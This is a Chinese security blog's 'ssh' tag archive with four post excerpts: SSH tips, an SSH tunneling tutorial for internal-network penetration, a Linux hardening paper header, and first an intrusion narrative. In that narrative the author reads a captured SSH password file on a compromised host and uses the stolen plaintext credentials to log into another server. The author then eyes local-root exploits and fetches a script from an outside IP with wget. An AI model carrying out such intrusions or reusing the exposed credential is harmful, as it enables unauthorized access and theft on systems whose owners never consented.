存档

文章标签 ‘ssh’

一台linux肉鸡的简单手工入侵检测过程

2010年4月12日 admin     2,300 views 没有评论

by:vitter
blog:blog.securitycn.net
今天发现一台肉鸡上某人的ssh连到另外一台服务器上,记录下了密码。
[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
直接ssh上去。

[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11′s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m

[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

是rhel5.0没升级过内核,vmsplice的local root应该可以的,不过测试了下,机器挂了,换udev的好了。

[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
–13:21:09– http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80… .. 200 OK
366 (3.3K) [application/x-sh]
Saving to: `u.sh’
阅读全文…

分类: 渗透测试 标签: , ,

SSH的一些安全小技巧

2010年4月2日 xion     2,629 views 没有评论

来源:linux.chinaunix.net

一, 前言

關於 ssh 的好處, 相信不用我多說了吧?
簡而言之, 之前的 rpc command 與 telnet 都全可用 ssh 代替.
比方如下的這些常見功能:
        – 遠端登錄
                ssh user@remote.machine
        – 遠端執行
                ssh user@remote.machine ‘command …’
        – 遠端複制
                scp user@remote.machine:/remote/path /local/path
                scp /local/path user@remote.machine:/remote/path 阅读全文…

分类: 渗透测试 标签: ,

内网渗透中SSh的巧用

2010年3月30日 xion     2,468 views 没有评论

文 ring04h[EST]

在渗透测试过程中,经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控制,无法通过互联网直接访问本地开放的服务,Windows方面,国内通常选择Lcx.exe来进行端口转发,在应用方面大多数人也会选择reDuh来进行端口转发,而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题。
由于时间有限,本文只详细的介绍ssh tunnel方面的知识,iptables的有空在加上。

SSH的三个端口转发命令:
ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host

-f Fork into background after authentication.
后台认证用户/密码,通常和-N连用,不用登录到远程主机。

-p port Connect to this port. Server must be on the same port.
被登录的ssd服务器的sshd服务端口。

-L port:host:hostport
将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

阅读全文…

分类: 渗透测试 标签: , ,

[zz]Linux Hardening & Security

2010年3月22日 admin     2,515 views 没有评论

From:http://www.milw0rm.com/papers/346

=======================================
|———–:[INFO]:——————|
|————————————-|
| Title: “Linux Hardening & Security” |
| Author: Krun!x | QK |
| E-Mail: only4lul@gmail.com |
| Home: madspot.org | ljuska.org |
| Date: 2009-06-20 |
=======================================

阅读全文…

分类: 网站防护 标签: , ,